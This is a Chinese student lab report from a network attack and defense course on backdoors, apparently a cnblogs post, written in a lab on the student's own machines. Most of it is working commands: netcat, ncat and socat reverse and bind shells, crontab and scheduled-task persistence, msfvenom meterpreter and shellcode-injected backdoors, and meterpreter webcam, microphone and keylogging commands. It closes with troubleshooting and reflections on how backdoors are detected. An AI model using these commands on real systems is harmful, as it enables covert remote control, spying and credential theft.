(1)下载解压ncat.rar,在主机上打开命令行输入ipconfig
查看本机ip地址为192.168.1.101
(2)在命令行进入ncat
所在文件夹中,输入ncat.exe -l -p 端口
打开监听;
(3)在kali终端中输入nc 主机IP地址 之前输入的端口号 -e /bin/sh
来反弹链接Windows;
(4)Windows中成功获得了Linux Shell,可运行任何指令,如ls,pwd
(1)在kali终端中输入sudo -s
进入管理员模式后输入ifconfig
查看ip地址为:192.168.174.129
(2)在Kali中使用nc -l -p 端口号
打开监听,对5204端口进行监听;
(3)在主机windows命令行中输入ncat.exe -e cmd.exe kali的ip地址 端口号
反弹连接Linux;
在windows中输入ncat.exe -l 5204进行监听,在kali中反弹链接windows;连接成功后可以使用nc来传输数据。
(1)在Windows命令行中,使用ncat.exe -l -p 5204
来监听5204端口;
(2)在kali中,终端里输入crontab -e
编辑一条定时任务,选择编辑器3,在底行插入30 * * * * /bin/netcat 192.168.1.101 5204 -e /bin/sh
,会在每个小时的第30分钟反向连接主机的5204端口。
(3)在21:30时候,已经反向连接至Linux,获取了Shell,可以输入指令。
(1)下载并解压socat.rar
;
(2)右击此电脑选择管理
,选择任务计划程序
,再选择创建任务
;
(3)在常规选项卡中填写任务名称,然后在触发器选项卡中新建触发器,选择在工作站锁定时
,设置为所有用户
;
(4)在操作选项卡中,选择新建操作
,设置中程序或脚本处选中你所下载解压的socat.exe的路径,在添加参数中填入tcp-listen:5204 exec:cmd.exe,pty,stderr
,把cmd.exe绑定到5204端口,同时把cmd.exe的stderr重定向stdout上。
(5)然后再Windows中的开始界面选择将用户锁定(也可以通过win+L锁定),重新登陆后,打开任务计划程序库,可以看到创建的任务zyzsocat已经开始运行。
(6)在Kali环境下输入指令socat - tcp:192.168.1.101:5204
,这里的第一个参数-代表标准的输入输出,第二个流连接到Windows主机相应端口,此时可以发现已经成功获得了一个cmd shell
;
(1)在kali中输入msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.174.129 LPORT=5204 -f exe > 20175204_backdoor.exe
反弹连接的IP为kali的ip地址,生成后门程序20175204_backdoor.exe
;
(2)在windows命令行中输入ncat.exe -lv 5204 > 20175204_backdoor.exe
获得当前连接状态;
(3)kali中输入nc 192.168.1.101 5204 < 20175204_backdoor.exe
,将生成的后门程序传送至主机;
(4)在Windows打开ncat所在文件夹,发现文件传输成功;
(5)kali输入msfconsole
进入msf控制台,后输入:
use exploit/multi/handler
进入监听模块,设置payloadset payload windows/meterpreter/reverse_tcp
,使用与生成后门程序时相同的payloadset LHOST 192.168.174.129
,set LPORT 5204
使用5204端口,exploit
设置完成,开始监听;
(6)然后在Windows中运行后门程序20175204_backdoor.exe
,发现kali获得主机的shell;
(1)在Kali环境中输入record_mic -d 5
指令可以截获时长为5s的一段音频;
(2)输入webcam_snap
使用摄像头拍照
(3)输入screenshot
进行截屏
(4)输入keyscan_start
开始记录下击键,输入keyscan_dump
指令读取击键的记录;
(5)使用getuid
指令来查看当前用户;
(1)使用msfvenom -l payload
查看msf提供的shellcode,可以得到linux/x86/shell/reverse_tcp
即为我们需要的shellcode;
(2)在命令行输入msfvenom -p linux/x86/shell/reverse_tcp -x pwn1-20175204 LHOST=192.168.174.129 LPORT=5204 -f elf > pwn1.exp2
生成后门程序;
(3)在另一个终端中启动mfs控制台(和任务三中过程相同),此时的playload为linux/x86/shell/reverse_tcp
。
kali输入msfconsole
进入msf控制台,后输入:
use exploit/multi/handler
进入监听模块,设置payloadset payload linux/x86/shell/reverse_tcp
,使用与生成后门程序时相同的payloadset LHOST 192.168.174.129
,set LPORT 5204
使用5204端口,exploit
设置完成,开始监听;
(4)在第二个终端中运行./pwn1-20175204
;在第三个终端中运行./pwn1.exp2
,可以发现成功获取反弹连接Shell,可以输入指令。
问题1:无法使用ifconfig查看ip地址。
解决方案:1.输入sudo -s
进入root模式,在输入ifconfig可以查看。2.输入ip add
可查看ip地址。
问题2:输入msfvenom
显示无法打开问题。
解决方案:由于bundler版本不匹配的问题,输入sudo gem install bundler:1.17.3
下载并安装该版本。
问题3:在运行socat时会出现弹窗如下,但不影响运行。
问题4:在运行pwn1.exp2
可执行文件时显示权限不够。
解决方案:使用chmod +x pwn1.exp2
赋予权限即可运行。
(1)例举你能想到的一个后门进入到你系统中的可能方式?
答:在信息安全技术中有提到过后门程序,在一些不正规的网站中下载的软件,可能是后门程序伪装的软件,虽然名字相同但其实是后门程序,安装时会有大量的捆绑垃圾软件,也会后台自动下载很多垃圾软件,自己也曾经深受其害,电脑中自动下垃圾软件。
(2)例举你知道的后门如何启动起来(win及linux)的方式?
答:在Windows中:设置任务计划程序,例如本次实验中创建任务中通过设置触发器的不同方式来启动程序。
在Linux中:在本次实验中学习到了可以通过crontab 设置定时启动,捆绑注入shellcode。
(3)Meterpreter有哪些给你映像深刻的功能?
答:所有功能都让我印象深刻,控制摄像头和录音就可以窥探生活隐私,能控制截屏和击键记录,完全可以得到你的一些账户和口令,不仅侵犯隐私,甚至可能会威胁财产安全。
(4)如何发现自己有系统有没有被安装后门?
答:我觉得首先还是要保持杀毒软件和防火墙的开启以便对电脑进行实时保护,除此之外还要定期杀毒,定期查看电脑自启动项有没有异常项或不熟悉的;也可以在命令行中查看端口开放和连接情况,是否被恶意链接。
本次实验让我进一步了解了后门程序和他的启动方式,虽然实验中遇到一些问题,但大部分经过网上搜索和参考同学博客也可以解决。这次试验也让我进一步意识到网络安全的重要性,尤其是曾经深受后门程序的危害,下载的虚假软件安装后后台自动安装更多的垃圾软件,还不知道安在哪里,也是经过网上搜索禁用相关服务,并且全面杀毒后才恢复正常;也让我意识到其实很多问题是由于用户自己的操作不当才导致的,我们不仅要通过杀毒软件和防火墙对电脑进行实时保护,更要提升自己的网络安全意识才能尽可能避免出现此类问题。
2019-2020-2 20175204 张湲祯《网络对抗技术》Exp2 后门原理与实践
原文:https://www.cnblogs.com/zyzgl/p/12501353.html